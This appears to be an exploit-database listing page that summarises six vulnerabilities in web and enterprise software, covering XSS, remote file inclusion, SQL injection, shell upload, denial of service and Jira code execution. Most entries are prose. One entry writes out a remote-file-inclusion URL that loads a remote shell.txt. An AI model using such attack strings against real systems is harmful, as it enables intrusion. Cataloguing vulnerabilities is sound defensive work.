
Explore Vulnerabilities


Explore all Exploits:

WordPress Plugin Ninja Forms 3.3.17 – Cross-Site Scripting

The WordPress plugin Ninja Forms version 3.3.17 is vulnerable to Cross-Site Scripting (XSS) attacks. An attacker can exploit this vulnerability by injecting malicious script code into the affected URLs. This can lead to the execution of arbitrary code or the disclosure of sensitive information to the attacker.

Remote File Inclusion in phpFaber.URLInn.v2.0.5.PHP.NULL-DGT

This vulnerability allows an attacker to include remote files in the vulnerable file /phpFaber.URLInn.v2.0.5.PHP.NULL-DGT/phpfaber_urlinn_2_0_5/urlinn_includes/config.php. The exploit URL is http://localhost/path/urlinn_includes/config.php?dir_ws=http://localhost/shell.txt?. The vulnerability occurs due to the presence of the vulnerable variable dir_ws in the code at line number 78.

miniBB 2.1 (table) Remote SQL Injection Exploit

This exploit allows an attacker to perform a remote SQL injection attack on miniBB 2.1. By manipulating the 'table' parameter in the URL, an attacker can inject SQL code into the query, potentially leading to unauthorized access to the database and disclosure of usernames and passwords. The exploit includes a proof of concept URL.

ProfileCMS v1.0 Shell Upload Exploit

This exploit allows an attacker to upload a PHP shell instead of an image while creating a profile on ProfileCMS v1.0. The vulnerable script can be found at http://slrate.com/profiles. By exploiting this vulnerability, an attacker can gain unauthorized access to the system and execute arbitrary commands.

Bosch Video Management System 8.0-Configuration Client-Denial of Service (Poc)

The exploit causes a denial of service in Bosch Video Management System 8.0 Configuration Client by causing it to crash. This is achieved by opening the Configuration Client and inputting a specific set of values in the fields. The exploit is executed through a Python script that generates a specific payload and saves it in a file called 'bosch.txt'. When this file is copied into the Configuration Client, it causes the program to crash.

Atlassian Jira Authenticated Upload Code Execution

This module can be used to execute a payload on Atlassian Jira via the Universal Plugin Manager (UPM). The module requires valid login credentials to an account that has access to the plugin manager. The payload is uploaded as a JAR archive containing a servlet using a POST request against the UPM component. The check command will test the validity of user-supplied credentials and test for access to the plugin manager.

Recent Exploits: